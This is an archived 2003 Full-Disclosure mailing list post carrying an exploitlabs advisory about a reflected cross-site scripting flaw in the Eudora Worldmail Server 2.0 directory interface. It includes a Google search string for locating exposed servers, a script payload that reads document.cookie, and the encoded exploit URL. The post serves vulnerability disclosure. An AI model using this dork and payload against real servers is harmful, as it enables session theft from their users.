[Full-Disclosure] Eudora Worldmail Server 2.0 -XSS Injection

From: morning_wood (se_cur_ityat_private)
Date: Fri Aug 15 2003 - 15:34:58 PDT

Next message: noir: "RE: Buffer overflow prevention"

Previous message: Crispin Cowan: "Re: Need help. Proof of concept 100% security."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------------------
          - EXPL-A-2003-020 exploitlabs.com Advisory 020
------------------------------------------------------------------
                  -= Eudora Worldmail Server 2.0 =-





Donnie Werner
Aug 9, 2003


Product:
--------
Eudora Worldmail Server 2.0

http://www.qualcomm.com/
http://www.eudora.com/worldmail/



Vunerability(s):
----------------
1. XSS injection


Description of product:
-----------------------
http://www.eudora.com/worldmail/features.html


Banner id:

HTTP/1.0 200 Document follows
Server: ISOCOR web500gw 2.0.0.3
MIME-Version: 1.0
Date: Wednesday, 06-Aug-2003  GMT
Content-type: text/html


examples could be found by:

http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&saf
e=off&q=Qpam.htm&btnG=Google+Search




VUNERABILITY / EXPLOIT
======================

Vunerable hosts display the following:

-------------- snip ----------------------

A convenient hypertext interface to LDAP and X.500 Directories.


Local domains and aliases
Results for: entries at the top level

 Name Description
Countries
 AE   <---------------- example country
 IT
 CA
--------------- snip --------------------

Select a country ( "AE" used as example )
you should see something like the following..

http://[host]:8888/c%3dAE

and a search box

"One-level search in AE:"

<FORM METHOD=GET ACTION="/c%3dAE">
<A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
<INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
<INPUT TYPE=reset VALUE="Clear"></FORM>

enter sum cool XSS...

<SCRIPT>alert(document.cookie);</SCRIPT>


and  get

http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C
%2FSCRIPT%3E

the results are rendered by the output of the formatted html.

yes, it just a non persistant XSS, but this is running as a service on
port 8888 and is a mail processing server, so there may be other issues
( DoS ? ) as well.

I belive LDAP has some DCOM connectivity, and there could be issues
with the LDAP...

SLAPD or X.500 Error: Not found
An error occurred while searching the SLAPD or X.500 directory
The error code was 32:

No such object.
No additional information is available.Please report errors to the
Administrator.


Local:
------
???

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
Concurrent with this advisory
eudora-custservat_private

Credits:
--------

Donnie Werner
morning_wood@e2-labs.com
http://e2-labs.com

Original at
http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-ser
ver.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: noir: "RE: Buffer overflow prevention"
Previous message: Crispin Cowan: "Re: Need help. Proof of concept 100% security."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Aug 15 2003 - 16:10:44 PDT